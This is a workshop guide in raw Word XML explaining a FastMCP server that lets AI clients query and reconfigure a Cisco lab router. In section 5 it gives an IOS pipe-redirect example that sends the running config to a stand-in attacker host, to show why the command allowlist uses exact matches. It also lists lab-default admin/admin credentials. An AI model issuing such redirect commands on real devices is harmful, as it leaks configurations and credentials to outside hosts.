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MCP Server Code Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Cisco Router MCP Server — FastMCP Edition (Student Guide)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">This guide walks through the complete server code you run in this workshop: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>code/server/app/main.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (referred to below as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main.py</w:t>
      </w:r>
      <w:r>
        <w:t>). Keep the file open next to this document — every section here maps to a clearly marked section banner in the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>What this server does in one sentence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it exposes a live Cisco IOS router (Router1, 172.18.2.6) to AI applications through the Model Context Protocol — tools the model can call, resources a client can read, prompts a user can invoke — over an authenticated HTTP endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. The Big Picture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LibreChat / MCP Inspector          (MCP clients)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|  Streamable HTTP  +  Authorization: Bearer &lt;token&gt;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http://172.18.1.2:8000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|-- GET  /       health check (no auth)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`-- /mcp         MCP endpoint (bearer token required)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FastMCP server  (tools, resources, prompts,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|            notifications, elicitation)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|  SSH (Netmiko, in worker threads)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Router1 (172.18.2.6, cisco_ios)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Three layers live in one file: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in main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>FastAPI app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hosts the health check and mounts everything</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bottom of the file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>BearerAuthMiddleware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Checks the token on every request to /mcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>near the bottom</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>FastMCP server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>The actual MCP implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>everything else</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>The old workshop server used the deprecated HTTP+SSE transport (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/sse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/messages/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and hand-wired JSON-RPC dispatch. This version uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Streamable HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the current MCP transport — one endpoint, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/mcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FastMCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the official SDK's high-level API. You will notice the difference immediately: there is no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>list_tools()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>call_tool()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pair to keep in sync. A decorator on a plain Python function does both jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Imports and Configuration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ROUTER_CONFIG =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"device_type": "cisco_ios",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"host": os.environ.get("ROUTER_HOST", "172.18.2.6"),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"username": os.environ.get("ROUTER_USER", "admin"),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"password": os.environ.get("ROUTER_PASSWORD", "admin"),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"secret": os.environ.get("ROUTER_SECRET", "admin"),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MCP_AUTH_TOKEN = os.environ.get("MCP_AUTH_TOKEN", "cisco-mcp-workshop")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Every value reads from an environment variable and falls back to the lab default. The defaults are intentional for this lab — the router credentials are printed in your lab sheet — but the pattern is the important part: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the code contains no value you could not safely publish.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Copy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.env.example</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>run.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loads it automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ALLOWED_SHOW_COMMANDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a Python set of exact command strings. It powers the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dynamic_show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tool and we will come back to why it is an exact-match set — not a prefix check — in section 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Creating the Server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mcp = FastMCP(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"cisco-router-mcp",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instructions=(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"Operates Router1, a live Cisco IOS lab router. Tools marked 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"read-only are always safe. configure_interface and create_loopback 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"modify live device configuration — always confirm with the user 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"before calling them, and state exactly what will change."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),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streamable_http_path="/mcp",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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Two things matter here:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>instructions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not a comment. It is sent to every client inside the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> response. LibreChat is configured with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>serverInstructions: true</w:t>
      </w:r>
      <w:r>
        <w:t>, so this text lands in the system prompt of your chat conversations. This is the server author speaking directly to the model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>streamable_http_path="/mcp"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sets the single URL the entire protocol runs over.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Talking to the Router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def _run_show(command: str)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connection = ConnectHandler(**ROUTER_CONFIG)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try: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return connection.send_command(command)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finally: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connection.disconnect()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run_show(command: str)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await anyio.to_thread.run_sync(_run_show, command)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Netmiko opens an SSH session to the router. That is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I/O — it freezes the thread until the router answers. The MCP server is async: one process serves every student session at once. If a tool ran Netmiko directly, one slow SSH call would stall everybody.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The fix is the two-function pattern you see for both </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>run_show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>run_config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the blocking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_run_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function does the SSH work, and the async wrapper pushes it onto a worker thread with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>anyio.to_thread.run_sync</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Every tool and resource in the file goes through these two helpers — never through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ConnectHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The error rule.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Look at any tool body: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try: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output = await run_show("show ip interface brief")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except Exception as exc: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f"Error talking to Router1: {exc}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Errors are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>returned as text, never raised</w:t>
      </w:r>
      <w:r>
        <w:t>. A raised exception becomes a protocol-level failure the model cannot read. Returned error text becomes a normal tool result — the model reads it, understands what went wrong, and often retries with corrected input. You will watch this happen live in the labs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Read-Only Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The anatomy of a FastMCP tool, using the simplest one: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@mcp.tool(annotations=types.ToolAnnotations(readOnlyHint=True))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get_interfaces(ctx: Context)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"""Get all router interfaces and their status (show ip interface brief)."""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await ctx.report_progress(0, 1, "Connecting to Router1 over SSH...")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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every part of the function definition becomes protocol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Becomes (in tools/list)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>function name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>tool name: get_interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>docstring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>tool description — the text the LLM reads to decide when to call it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>type-hinted parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>inputSchema (JSON Schema, generated for you)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>return annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>outputSchema, when it is a structured type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>annotations=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>readOnlyHint / destructiveHint flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The docstring is prompt engineering.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It is the only thing the model knows about your tool. Vague docstring, wrong tool calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Annotations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> declare intent: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>readOnlyHint=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> marks a tool as safe to call freely; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>destructiveHint=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (section 6) warns clients the tool changes real state. On network equipment this distinction is the whole ballgame.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ctx.report_progress(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sends progress notifications while SSH is working. Inspector shows them; LibreChat uses them to extend its tool timeout (slow router, no timeout kill).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Structured output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get_router_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns a Pydantic model instead of a string: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class RouterInfo(BaseModel):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hostname: str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version: str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uptime: str</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The client receives machine-readable JSON validated against a schema, not text it has to parse. Check the tool in Inspector — you will see an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>outputSchema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the other tools do not have.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dynamic_show and the allowlist.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The model chooses the IOS command; the server decides if it runs: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normalized = " ".join(command.lower().split())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if normalized not in ALLOWED_SHOW_COMMANDS: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f"Command rejected: ..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Why exact match and not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>command.startswith("show")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? Because prefix matching allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show running-config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (leaks credentials and SNMP strings) and IOS pipe tricks like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show run | redirect tftp://attacker/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a "read-only" prefix check that can write your config to a remote server. Exact matching against a curated set closes both holes. The rejection message lists the allowed commands on purpose: the model reads the error and retries with a valid one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>snapshot_config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> captures </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>show running-config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a timestamped file under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>snapshots/</w:t>
      </w:r>
      <w:r>
        <w:t>. It is the rollback anchor — take a snapshot, change things, and you always have the before state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Config-Writing Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>configure_interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>create_loopback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> modify a live router. They are handled differently in three ways:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. They carry the destructive annotation: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_CONFIG_TOOL_ANNOTATIONS = types.ToolAnnotations(readOnlyHint=False, destructiveHint=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. They are registered dynamically, not decorated.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> They are plain functions listed in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_CONFIG_TOOLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, registered by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_register_config_tools()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enable_config_tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tool adds or removes them at runtime and then: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await ctx.session.send_tool_list_changed()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">That line fires a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>notifications/tools/list_changed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — subscribed clients refresh their tool list live. You will watch the tool list shrink and grow in Inspector. The operational pattern being modeled: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>destructive capability is an explicit toggle, not an always-on default.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (In this lab they start enabled so the LibreChat exercise works — LibreChat only discovers tools at startup and ignores the notification. Set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MCP_CONFIG_TOOLS_DEFAULT=disabled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to start locked down.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. They ask permission first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the elicitation gate, next section. They also auto-snapshot the config before changing it, and notify resource subscribers after (section 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. The Elicitation Gate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Elicitation lets a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pause mid-tool-call and ask the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a structured question through the client. Here it guards every config write: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result = await ctx.elicit(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message=f"{description} This modifies a live lab router. Proceed?",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schema=ConfirmChange,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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">In Inspector, calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>configure_interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pops a real confirmation dialog. Decline, and the tool returns "Change cancelled by user." — the router is never touched.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">But look at the first thing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_confirm_change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does: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supports_elicitation = ctx.session.check_client_capability(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types.ClientCapabilities(elicitation=types.ElicitationCapability())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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Clients declare what they support during </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — this is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>capability negotiation</w:t>
      </w:r>
      <w:r>
        <w:t>. LibreChat declares no elicitation support, so eliciting against it would fail. The gate degrades: the change proceeds, and the result is prefixed with a warning that no interactive confirmation happened. Same server, same tool — Inspector gets a confirmation dialog, LibreChat gets a warning. That difference is the most important lesson in this file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">One spec rule to memorize: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>elicitation must never be used to collect secrets or credentials.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Confirmation questions, choices, parameters — yes. Passwords and API keys — never.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Resources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@mcp.resource("router://running-config", description="Live running configuration of Router1")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running_config_resource()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await run_show("show running-config")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
